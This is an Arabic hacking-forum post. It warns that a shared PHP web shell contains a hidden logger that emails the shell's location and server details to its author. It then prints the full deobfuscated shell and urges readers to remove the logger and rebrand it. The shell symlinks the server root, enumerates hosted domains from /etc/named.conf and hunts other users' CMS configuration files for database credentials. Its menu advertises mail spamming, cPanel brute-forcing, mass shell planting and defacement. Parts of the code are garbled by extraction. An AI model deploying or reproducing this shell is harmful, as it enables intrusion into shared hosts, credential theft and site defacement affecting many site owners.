الشيل ملغم يا سيادة المشرف العام
وحرام عليك انك تسرق مجهود الهاكرز المبتدئين انت اكبر من هذا
كود التلغيم وشرحة
كود PHP:
$IIIIIIIIIIII='[email protected]';
$IIIIIIIIIIIl='BLACK Sh3ll Logger';
$IIIIIIIIIII1='File path : '.$_SERVER['DOCUMENT_ROOT']."\r\n";
$IIIIIIIIIII1.='Server Admin : '.$_SERVER['SERVER_ADMIN']."\r\n";
$IIIIIIIIIII1.='Operating System : '.$_SERVER['SERVER_SOFTWARE']."\r\n";
$IIIIIIIIIII1.='Shell Link : http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$IIIIIIIIIII1.='Avlanan Site : '.$_SERVER['HTTP_HOST']."\r\n";
mail($IIIIIIIIIIII,$IIIIIIIIIIIl,$IIIIIIIIIII1); 
الذكي قام بوضع متغير $IIIIIIIIIIII ليساوي ايميلة[email protected] كما ترون في السطر الاول
نأتي للسطر الثاني $IIIIIIIIIIIl='BLACK Sh3ll Logger' هذا هو عنوان موضوع الرسالة التي ستصلة علي ايميلة
باقي الاسطر هي نص الرسالة ولو اخذتم الدوال وبحثتم عنها في جوجل فهي ترسل له عنوان الشيل و نوع الشيل ومسار الشيل ونوع سوف وير السيرفر
السطر الاخير
mail($IIIIIIIIIIII,$IIIIIIIIIIIl,$IIIIIIIIIII1)
هي دالة mail() ابحثوا عنها في جوجل يا شطار
اول خانة طبعا هي ايميلة الذي قامة بتعريفة بالمتغير $IIIIIIIIIIII
وثاني خانة $IIIIIIIIIIIl طبعا هوعنوان الرسالة BLACK Sh3ll Logger
وثالث خانة $IIIIIIIIIII1 هو نص الرسالة وهي بيانات السيرفر وعنوان الشيل
واقول لة يا اخي ماذا استفدت من هذا التلغيم الفاشل الواضح جدا
فانت تعلم انك لن تخدع سوي هاكر مبتدأ وحرام عليك ان تسرق مجهود هاكر مبتدأ
وهذا كود الشيل كاملا بعد فك تشفيرة الساذج انزعوا منه التلغيم يا شباب وعدلوا الشيل واحذفوا اسمة واسم المنتدي ههههههههههههههههههه

كود PHP:
session_start();

// Set Username & Password
$user = "BLACK.JaGuAr";
$pass = "BLACK.JaGuAr";

$auth_pass = "BLACK.JaGuAr";
@define('VERSION','1.1');
@error_reporting(E_ALL ^ E_NOTICE);
@session_start();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);

if(get_magic_quotes_gpc()) {
    function sodstripslashes($array) {
        return is_array($array) ? array_map('sodstripslashes', $array) : stripslashes($array);

    }

    $_POST = sodstripslashes($_POST);

}
function printLogin() {
    ?>
    

<hr>
<?php }


if(isset(
$_POST['uname']) && isset($_POST['passwd']))
{
    if( 
$_POST['uname'] == $user && $_POST['passwd'] == $pass )
    {
         
setcookie("hacked"md5($pass));
         
$selfenter $_SERVER["PHP_SELF"];
         
header("Location:$selfenter");
    }
}
        
if((!isset(
$_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
{
        
?>
<font size="6" face="Times New Roman, Times, serif" color="#00CC00"><br>

<head>
    <title>BLACK.JaGuAr Login Panel</title>
    <link href="http://www.aljyyosh.com/images/ye.gif" rel="shortcut icon">
    
</head>
    <center>
    <form method="POST">
                <div style="background-color:#000066; width:490px; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:311px; background-image:url('Windows_7_-_Alien_from_outer_space.jpg')">
        <table cellpadding="9" cellspacing="4" height="264">
        <tr>
                <td align="center" colspan="2"><b>
                <font size="5" color="#FF0000">BLACK</font><font color="#FFFFFF" size="5">.JaGuAr </font>
                <font size="5">login panel</font></b><font size="5"><b>
                </b></font></td>
            </tr>
            <tr>
                <td align="right"><b>User Name : </b></td>
                <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="User Name" onFocus="if (this.value == 'User Name'){this.value='User Name'; this.style.color='black';}" onBlur="if (this.value == 'User Name') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
            </tr>
            <tr>
                <td align="right"><b>Password : </b></td>
                <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;"  value="YeMeN" onFocus="if (this.value == 'YeMeN'){this.value='YeMeN'; this.style.color='black';}" onBlur="if (this.value == 'YeMeN') {this.value='YeMeN'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
            </tr>
            <tr>
                <td align="center" colspan="2"><input type="submit" class="but" value="     Enter     "></td>
            </tr>
            </table>
    </div>
    
    </form>
    </center>
<br>
<body bgcolor="#000000">
</body>
</html>

<?php
    
exit;
}
if( !isset( 
$_SESSION[md5($_SERVER['HTTP_HOST'])] ))
    if( empty( 
$auth_pass ) ||
        ( isset( 
$_POST['pass'] ) && ($_POST['pass'] == $auth_pass ) ) )
        
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        
printLogin();


$IIIIIIIIIIII='[email protected]';
$IIIIIIIIIIIl='BLACK Sh3ll Logger';
$IIIIIIIIIII1='File path : '.$_SERVER['DOCUMENT_ROOT']."\r\n";
$IIIIIIIIIII1.='Server Admin : '.$_SERVER['SERVER_ADMIN']."\r\n";
$IIIIIIIIIII1.='Operating System : '.$_SERVER['SERVER_SOFTWARE']."\r\n";
$IIIIIIIIIII1.='Shell Link : http://'.$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$IIIIIIIIIII1.='Avlanan Site : '.$_SERVER['HTTP_HOST']."\r\n";
mail($IIIIIIIIIIII,$IIIIIIIIIIIl,$IIIIIIIIIII1);
;echo 

'
;
echo 
' ';
@
set_time_limit(0);
$IIIIIIIIIIll 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
$IIIIIIIIIIl1=explode('/',$IIIIIIIIIIll );
$IIIIIIIIIIll =str_replace($IIIIIIIIIIl1[count($IIIIIIIIIIl1)-1],'',$IIIIIIIIIIll );
;echo 
'  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>BLACK.JaGuAr Hack Tools</title>
<link href="http://www.aljyyosh.com/images/ye.gif" rel="shortcut icon">
<style type="text/css">
/* STIL DOSYAMIZI OLU?TURMAYA BA?LIYORUZ... */

#wrap {width:100%;margin:0 auto;}

/* Men� kodlar?m?z bu alanda ba?l?yor, l�tfen yorumlar? takip ediniz. */

#menu {
font:14px arial, verdana, sans-serif;
width:100%
}

#menu ul {
list-style:none;
margin:0;
background:#000000 url(menubg.gif) repeat-x bottom; /* men� arkaplan resmimiz tan?mlan?yor. */
padding:5px;

/* Firefox, Chrome, Safari taray?c?lar i�in Border radius ve Shadow tan?mlar? yap?l?yor */

-moz-border-radius:4px; /* men�m�z�n yuvarlak k??eleri tan?mlan?yor. */
-moz-box-shadow:0px 1px 2px #333; /* burada men�m�ze �ok k���k bir g?lge efekti veriyoruz */

-khtml-border-radius:4px; /* men�m�z�n yuvarlak k??eleri tan?mlan?yor. */
-khtml-box-shadow:0px 1px 2px #333; /* burada men�m�ze �ok k���k bir g?lge efekti veriyoruz */

-webkit-border-radius:4px; /* men�m�z�n yuvarlak k??eleri tan?mlan?yor. */
-webkit-box-shadow:0px 1px 2px #333; /* burada men�m�ze �ok k���k bir g?lge efekti veriyoruz */
}

#menu li { /* men�m�z�n liste tan?m? yap?l?yor. */
list-style:none;
padding:0;
margin:0;
float:left;
position:relative;
}

#menu a {
color:#fff;
text-decoration:none;
padding:4px;
display:block;
text-shadow:0px 1px 2px #000;
margin:0px 10px 0px 10px;
}

#menu a:hover {
color:#fff;
text-decoration:none;
padding:4px;
background:#333;
-moz-border-radius:3px; /* men� ba?lant?lar?m?za k���k bir g?lge efekti veriyoruz. */
-khtml-border-radius:3px;
-webkit-border-radius:3px;
display:block;
}

/* Alt men�lerimizi gizliyor ve sonras?nda alt men�n�n stil tan?mlamalar?na ge�iyoruz. */

#menu li ul {
display:none; /* Alt men�lerimizi gizliyoruz! */
position:absolute;
padding:0px;
margin:0px;
}

#menu li:hover > ul {
display:block; /* Alt men�lerimiz #menu li �zerine fare ile gelinince g?r�necek ?ekilde hover ile g?sterimini sa?l?yoruz. */
position:absolute;
padding:0px 0px 0px 0px; /* margin ve padding de?erlerini uygun ?ekilde ayarl?yoruz. */
margin:0px 10px 0px 10px;
width:150px;
left:0
}


/* Alt men� g?r�n�m�n� de?i?tirecek olan stilleri yaz?yoruz. */

#menu ul ul {
-moz-border-radius:4px; /* alt men�m�z�n k??elerini yuvarl?yoruz. */
-webkit-box-shadow:0px 1px 2px #2e83ff; /* ve burada da biraz g?lge kat?yoruz. */
-khtml-box-shadow:0px 1px 2px #2e83ff; /* ve burada da biraz g?lge kat?yoruz. */

width:150px;
margin:0px 10px 0px 10px;
border:1px solid #777;

}

#menu ul ul li {
display:block;
float:none;
}

#menu ul ul a { /* alt men� listemizin linklerini tan?ml?yoruz. */
display:block;
font:14px/20px arial, verdana, sans-serif;
margin:0;
background:#888;
border-bottom:1px solid #777
}

#menu ul ul a:hover {
background:#f5cd14;
color:#fff;
}

/* Buradan sonraki sat?rlar ?nizleme sayfam?zda yapt???m?z a�?klama alanlar?n? tan?ml?yor */

.bilgi {margin:0 auto;width:700px;background:#eee;color:#333;border:2px solid #ddd;margin:30px 0px 10px 0px;padding:10px;font:14px/24px arial, verdana, sans-serif;text-align:left;}
.bilgi h2 {font:bold 18px arial, verdana, sans-serif;color:#f91365;}
.bilgi a {color:#fff; background:#2e83ff;padding:4px;text-decoration:none}
.bilgi a:hover {color:#fff; background:#333;padding:4px;text-decoration:none}
.bilgi em {border-bottom:1px solid #999;}
</style>
<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}


body {
    direction: ltr;
    background-color:#000000;
    color: rgb(153, 153, 153);
    text-align: center
}

input,textarea,select{
font-weight: bold;
color: #111111;
dashed #ffffff;
border: 1px
solid #BBBBBB;
background-color: #DDDDDD;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 13pt;
}

.ir {
  color: #FF0000;
}

</style>

</head>

<body>

<div class=\'all\'>


'
;
@
mkdir('sym',0777);
$IIIIIIIIII11  "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$IIIIIIIIIlII =@fopen ('sym/.htaccess','w');
fwrite($IIIIIIIIIlII ,$IIIIIIIIII11);
@
symlink('/','sym/root');
$IIIIIIIIIlll basename(__FILE__);

echo 
'<div id=wrap>
<div id=menu>
<ul>
<font face="Times New Roman, Times, serif" ><br>
<li><b><a href="?"><font color="blue">HOME</font></a></b>

</li>

<li><b><a href=?blackr00t=php_ini><font color="#008080">Safe</font> ****er</a>

</li>

<li><b><a href=?blackr00t=sql><font color="#008080">My</font>sql</a></b>
</li>


<li><b><a href=?blackr00t=sym><font color="#008080">User</font>-Domains-<font color="#008080">Symlink</font>-Pagerank</a>

</li>




<li><b><a href=?blackr00t=file><font color="#008080">Symlink</font> File</a>

</li>

<li><b><a href=?blackr00t=open&basedir=bypass><font color="#008080">Open</font>_Basedir</a>
</li>

<li><b><a href=?blackr00t=config><font color="#008080">Config</font> ****er</a>
</li>

<li><b><a href=?blackr00t=mail><font color="#008080">Mail</font> Spammer</a></b>
</li>

<li><b><a href=?blackr00t=reverse><font color="#008080">Reverse</font> IP</a>

</li>

<li><b><a href="?blackr00t=cpanel"><font color="#008080">Cpanel</font> Brute </a>
</li>

<li><b><a href=?blackr00t=pyth><font color="#008080">Python</font> Sh3ll</a>
</li>

<li><a href=?blackr00t=telnet><font color="#008080">Cgi</font> Sh3ll</a>

</li>

<br style=clear:both />
</ul>




</div>

</div>'
;
echo 
'<div id=wrap>
<div id=menu>
<ul>

<font face="Times New Roman, Times, serif" ><br>



<li><b><a href=?blackr00t=sec><font color="#008080">Domains</font>-Script</a>

</li>

<li><b><a href=?blackr00t=wp><font color="#008080">Mass</font> Wordpress  Sh3ll </a>
</li>

<li><b><a href=?blackr00t=joom><font color="#008080">Mass</font> Joomla Sh3ll </a>
</li>


<li><a href=?blackr00t=zone><font color="#008080">Zone</font>-h </a>
</li>
            


<br style=clear:both />
</ul>




</div>

</div>'
;
if(isset(
$_REQUEST['blackr00t']))
{
switch (
$_REQUEST['blackr00t'])
{
case 
'sec':
$IIIIIIIIIl1I = @file('/etc/named.conf');
if(!
$IIIIIIIIIl1I)
{
die (
" can't read /etc/named.conf");
}
else
{
echo 
"
<table align='center' width='40%'><td> Domains </td><td> Script </td>"
;
foreach(
$IIIIIIIIIl1I as $IIIIIIIIIl11){
if(
eregi('zone',$IIIIIIIIIl11)){
preg_match_all('#zone "(.*)"#',$IIIIIIIIIl11,$IIIIIIIII1I1);
flush();
if(
strlen(trim($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1l1 posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIII1I1[1][0]));
$IIIIIIIII111=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/wp-config.php';
$IIIIIIIIlIII=get_headers($IIIIIIIII111);
$IIIIIIIIlIIl=$IIIIIIIIlIII[0];
$IIIIIIIIlII1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/blog/wp-config.php';
$IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
$IIIIIIIIlIll=$IIIIIIIIlIlI[0];
$IIIIIIIIlIl1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/configuration.php';
$IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
$IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
$IIIIIIIIlI11=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/joomla/configuration.php';
$IIIIIIIIllII=get_headers($IIIIIIIIlI11);
$IIIIIIIIllIl=$IIIIIIIIllII[0];
$IIIIIIIIllI1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/includes/config.php';
$IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
$IIIIIIIIllll=$IIIIIIIIlllI[0];
$IIIIIIIIlll1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/vb/includes/config.php';
$IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
$IIIIIIIIll1l=$IIIIIIIIll1I[0];
$IIIIIIIIll11=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/forum/includes/config.php';
$IIIIIIIIl1II=get_headers($IIIIIIIIll11);
$IIIIIIIIl1Il=$IIIIIIIIl1II[0];
$IIIIIIIIl1I1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'public_html/clients/configuration.php';
$IIIIIIIIl1lI=get_headers($IIIIIIIIl1I1);
$IIIIIIIIl1ll=$IIIIIIIIl1lI[0];
$IIIIIIIIl1l1=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/support/configuration.php';
$IIIIIIIIl1lI=get_headers($IIIIIIIIl1l1);
$IIIIIIIIl11I=$IIIIIIIIl1lI[0];
$IIIIIIIIl11l=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/client/configuration.php';
$IIIIIIIIl111=get_headers($IIIIIIIIl11l);
$IIIIIIII1III=$IIIIIIIIl111[0];
$IIIIIIII1IIl=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/submitticket.php';
$IIIIIIII1II1=get_headers($IIIIIIII1IIl);
$IIIIIIII1IlI=$IIIIIIII1II1[0];
$IIIIIIII1Ill=$IIIIIIIIIIll.'/sym/root/home/'.$IIIIIIIII1l1['name'].'/public_html/client/configuration.php';
$IIIIIIII1Il1=get_headers($IIIIIIII1Ill);
$IIIIIIII1I1I=$IIIIIIII1Il1[0];
$IIIIIIII1I1l strpos($IIIIIIIIlIIl,'200');
$IIIIIIII1lII='&nbsp;';
if (
strpos($IIIIIIIIlIIl,'200') == true )
{
$IIIIIIII1lII="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
}
elseif (
strpos($IIIIIIIIlIll,'200') == true)
{
$IIIIIIII1lII="<a href='".$IIIIIIIIlII1."' target='_blank'>Wordpress</a>";
}
elseif (
strpos($IIIIIIIIlI1l,'200')  == true and strpos($IIIIIIII1IlI,'200')  == true )
{
$IIIIIIII1lII=" <a href='".$IIIIIIII1IIl."' target='_blank'>WHMCS</a>";
}
elseif (
strpos($IIIIIIIIl11I,'200')  == true)
{
$IIIIIIII1lII =" <a href='".$IIIIIIIIl1l1."' target='_blank'>WHMCS</a>";
}
elseif (
strpos($IIIIIIII1III,'200')  == true)
{
$IIIIIIII1lII =" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
}
elseif (
strpos($IIIIIIIIlI1l,'200')  == true)
{
$IIIIIIII1lII=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
}
elseif (
strpos($IIIIIIIIllIl,'200')  == true)
{
$IIIIIIII1lII=" <a href='".$IIIIIIIIlI11."' target='_blank'>Joomla</a>";
}
elseif (
strpos($IIIIIIIIllll,'200')  == true)
{
$IIIIIIII1lII=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
}
elseif (
strpos($IIIIIIIIll1l,'200')  == true)
{
$IIIIIIII1lII=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
}
elseif (
strpos($IIIIIIIIl1Il,'200')  == true)
{
$IIIIIIII1lII=" <a href='".$IIIIIIIIll11."' target='_blank'>vBulletin</a>";
}
else
{
continue;
}
$IIIIIIII1lIl $IIIIIIIII1l1['name'] ;
echo 
'<tr><td><a href=http://www.'.$IIIIIIIII1I1[1][0].'/>'.$IIIIIIIII1I1[1][0].'</a></td>
<td>'
.$IIIIIIII1lII.'</td></tr>';flush();
}
}
}
}
break;
case 
'sym':
function 
IIIIIIII1lI1($IIIIIIII1llI,$IIIIIIII1lll,$IIIIIIII1ll1
{
$IIIIIIII1l1I 4294967296;
$IIIIIIII1l1l strlen($IIIIIIII1llI);
for (
$IIIIIIII1l11 0;$IIIIIIII1l11 <$IIIIIIII1l1l;$IIIIIIII1l11++) {
$IIIIIIII1lll *= $IIIIIIII1ll1;
if (
$IIIIIIII1lll >= $IIIIIIII1l1I) {
$IIIIIIII1lll = ($IIIIIIII1lll -$IIIIIIII1l1I * (int) ($IIIIIIII1lll $IIIIIIII1l1I));
$IIIIIIII1lll = ($IIIIIIII1lll <-2147483648) ?($IIIIIIII1lll +$IIIIIIII1l1I) : $IIIIIIII1lll;
}
$IIIIIIII1lll += ord($IIIIIIII1llI{$IIIIIIII1l11});
}
return 
$IIIIIIII1lll;
}
function 
IIIIIIII11Il($IIIIIIII11I1
{
$IIIIIIII11lI IIIIIIII1lI1($IIIIIIII11I1,0x1505,0x21);
$IIIIIIII11ll IIIIIIII1lI1($IIIIIIII11I1,0,0x1003F);
$IIIIIIII11lI >>= 2;
$IIIIIIII11lI = (($IIIIIIII11lI >>4) &0x3FFFFC0 ) |($IIIIIIII11lI &0x3F);
$IIIIIIII11lI = (($IIIIIIII11lI >>4) &0x3FFC00 ) |($IIIIIIII11lI &0x3FF);
$IIIIIIII11lI = (($IIIIIIII11lI >>4) &0x3C000 ) |($IIIIIIII11lI &0x3FFF);
$IIIIIIII11l1 = (((($IIIIIIII11lI &0x3C0) <<4) |($IIIIIIII11lI &0x3C)) <<) |($IIIIIIII11ll &0xF0F );
$IIIIIIII111I = (((($IIIIIIII11lI &0xFFFFC000) <<4) |($IIIIIIII11lI &0x3C00)) <<0xA) |($IIIIIIII11ll &0xF0F0000 );
return (
$IIIIIIII11l1 |$IIIIIIII111I);
}
function 
IIIIIIII111l($IIIIIIII1111
{
$IIIIIIIlIIII 0;
$IIIIIIIlIIIl 0;
$IIIIIIIlIII1 sprintf('%u',$IIIIIIII1111) ;
$IIIIIIII1l1l strlen($IIIIIIIlIII1);
for (
$IIIIIIII1l11 $IIIIIIII1l1l -1;$IIIIIIII1l11 >= 0;$IIIIIIII1l11 --) {
$IIIIIIIlIIll $IIIIIIIlIII1{$IIIIIIII1l11};
if (
=== ($IIIIIIIlIIIl %2)) {
$IIIIIIIlIIll += $IIIIIIIlIIll;
$IIIIIIIlIIll = (int)($IIIIIIIlIIll 10) +($IIIIIIIlIIll %10);
}
$IIIIIIIlIIII += $IIIIIIIlIIll;
$IIIIIIIlIIIl ++;
}
$IIIIIIIlIIII %= 10;
if (
!== $IIIIIIIlIIII) {
$IIIIIIIlIIII 10 -$IIIIIIIlIIII;
if (
=== ($IIIIIIIlIIIl %2) ) {
if (
=== ($IIIIIIIlIIII %2)) {
$IIIIIIIlIIII += 9;
}
$IIIIIIIlIIII >>= 1;
}
}
return 
'7'.$IIIIIIIlIIII.$IIIIIIIlIII1;
}
function 
IIIIIIIlIIl1($IIIIIIIlII1I) {
$IIIIIIIlII1l curl_init();
curl_setopt($IIIIIIIlII1l,CURLOPT_HEADER,0);
curl_setopt($IIIIIIIlII1l,CURLOPT_RETURNTRANSFER,1);
curl_setopt($IIIIIIIlII1l,CURLOPT_URL,$IIIIIIIlII1I);
$IIIIIIIlIlIl curl_exec($IIIIIIIlII1l);
curl_close($IIIIIIIlII1l);
return 
$IIIIIIIlIlIl;
}
function 
IIIIIIIlIlll($IIIIIIIlII1I) {
$IIIIIIIlIll1='http://toolbarqueries.google.com/tbr?client=navclient-auto&hl=en&ch='.IIIIIIII111l(IIIIIIII11Il($IIIIIIIlII1I)).'&features=Rank&q=info:'.$IIIIIIIlII1I.'&num=100&filter=0';
$IIIIIIIlIlIl=IIIIIIIlIIl1($IIIIIIIlIll1);
$IIIIIIIlIl1I strpos($IIIIIIIlIlIl,'Rank_');
if(
$IIIIIIIlIl1I === false){}else{
$IIIIIIIlIl1l substr($IIIIIIIlIlIl,$IIIIIIIlIl1I +9);
return 
$IIIIIIIlIl1l;
}
}
$IIIIIIIIIl1I = @file('/etc/named.conf');
if(!
$IIIIIIIIIl1I)
{
die (
" can't read /etc/named.conf");
}
else
{
echo 
"<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td><td>Pagerank</td>";
foreach(
$IIIIIIIIIl1I as $IIIIIIIIIl11){
if(
eregi('zone',$IIIIIIIIIl11)){
preg_match_all('#zone "(.*)"#',$IIIIIIIIIl11,$IIIIIIIII1I1);
flush();
if(
strlen(trim($IIIIIIIII1I1[1][0])) >2){
$IIIIIIIII1l1 posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIII1I1[1][0]));
$IIIIIIII1lIl $IIIIIIIII1l1['name'] ;
@
symlink('/','sym/root');
$IIIIIIII1lIl $IIIIIIIII1I1[1][0];
$IIIIIIIlI1II '\.ir';
$IIIIIIIlI1Il '\.il';
if (
eregi("$IIIIIIIlI1II",$IIIIIIIII1I1[1][0]) or eregi("$IIIIIIIlI1Il",$IIIIIIIII1I1[1][0]) )
{
$IIIIIIII1lIl "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIII1I1[1][0].'</div>';
}
echo 
"
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www."
.$IIIIIIIII1I1[1][0].'/>'.$IIIIIIII1lIl.' </a> </div>
</td>


<td>
'
.$IIIIIIIII1l1['name']."
</td>

<td>
<a href='sym/root/home/"
.$IIIIIIIII1l1['name']."/public_html' target='_blank'>symlink </a>
</td>

<td><b><font color=red> "
.IIIIIIIlIlll($IIIIIIIII1I1[1][0]).'</b></font></td>
</tr></div> '
;
flush();
}
}
}
}
break;
case 
'file':
echo 
'


<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
<input type="text" name="symfile" value="( Ornek: 1.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
'
;
$IIIIIIIlI1I1 $_POST['file'];
$IIIIIIIlI1lI $_POST['symfile'];
$IIIIIIIlI1ll $_POST['symlink'];
if (
$IIIIIIIlI1ll)
{
@
symlink("$IIIIIIIlI1I1","sym/$IIIIIIIlI1lI");
echo 
'<br /><a target="_blank" href="sym/'.$IIIIIIIlI1lI.'" >'.$IIIIIIIlI1lI.'</a>';
}
break;
case 
'telnet':
mkdir('cgiweb',0755);
chdir('cgiweb');
$IIIIIIIlI11I '.htaccess';
$IIIIIIIlI11l "$IIIIIIIlI11I";
$IIIIIIIlI111 fopen ($IIIIIIIlI11l ,'w') or die ('Dosya açılamadı!');
$IIIIIIIllIII 'Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root'
;
fwrite $IIIIIIIlI111 ,$IIIIIIIllIII ) ;
fclose ($IIIIIIIlI111);
$IIIIIIIllII1 =